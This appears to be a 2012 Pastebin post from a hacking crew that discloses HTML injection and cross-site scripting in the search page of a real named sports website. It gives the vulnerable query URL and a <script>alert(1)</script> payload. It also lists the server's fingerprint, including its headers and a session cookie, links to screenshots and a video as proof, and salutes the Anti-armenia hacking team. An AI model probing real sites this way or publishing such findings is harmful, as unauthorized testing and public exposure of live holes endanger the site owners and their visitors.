Advertisement
Avatar_Fearless

Title : TMR XSS + HTML Injection

Oct 12th, 2012
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.99 KB | None | 0 0
  1. +-------------------------------------------+
  2. Title : TMR XSS + HTML Injection
  3. Target site : http://timra.se/
  4. Vuln Type : Hyper Text Markup Language Injection
  5. Author : Avatar Fearless
  6. Info (i) ~~~~~~
  7. Header's :
  8. HTTP/1.1 200 OK =>
  9. Cache-Control => private
  10. Content-Type => text/html; charset=utf-8
  11. Expires => Thu, 11 Oct 2012 16:15:34 GMT
  12. Server => Microsoft-IIS/7.5
  13. Set-Cookie => ASP.NET_SessionId=aulv0q5u52murewpydzjbjc2; path=/; HttpOnly
  14. X-AspNet-Version => 4.0.30319
  15. X-Powered-By => ASP.NET
  16. Date => Fri, 12 Oct 2012 16:15:34 GMT
  17. Connection => close
  18. Content-Length => 19669
  19. Tested on : WIndows 7 Professional x86
  20. Analytics : Google Analytics
  21. [# Website Pageviews
  22. 1 www.google.com 32,074
  23. 2 stackoverflow.com 25,706
  24. 3 www.reddit.com 22,825]
  25. System :
  26. ~jQuery(Javascript Framework)
  27. ~IIS (Web Server)
  28. ~Microsoft ASP.NET(Web Framework)
  29. ~Windows Server(Operating System)
  30. +-------------------------------------------+
  31. Vulnerability on : Search System(Search Plugin/widget)
  32.  
  33. +------------------!Using HTML injection!------------------+
  34. Taget : www.timra.se
  35. Searching something easy(ex: asd) :
  36. http://timra.se/sok/?query=asd
  37. Using <h1> HTML tag`s :
  38. http://timra.se/sok/
  39. It parse in URL & take in input. But it not parse in search textbox & it take in input.
  40. http://imageshack.us/scaled/landing/28/tmrw.png
  41.  
  42. +------------------!Using Cross Site Scripting{XSS}!------------------+
  43. Target : www.timra.se
  44. Searching Something easy[again ;P](ex: asd) :
  45. http://timra.se/sok/?query=asd
  46. Using most usually JS(Javascript) tag <script>alert(1);</script> :
  47. http://timra.se/sok/
  48. It parse in URL & take in input. But it not parse in search textbox & it take in input.
  49. http://imageshack.us/scaled/landing/21/tmr2.png
  50.  
  51. Bonus Proof :
  52. http://youtu.be/qJo-daSAXnY
  53.  
  54. SHOUT`ZZZ & RESPECT TO :
  55. Anti-armenia.ORG (AA - Anti-armenia Team)
  56. All My Bro'S & ESPECIALLY :
  57. AkaStep , MetaizM , Ferid23 , BOT_25 , Leroy , AzSecurity
  58. All Anti-armenia Team member's!!!
  59. +-------------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement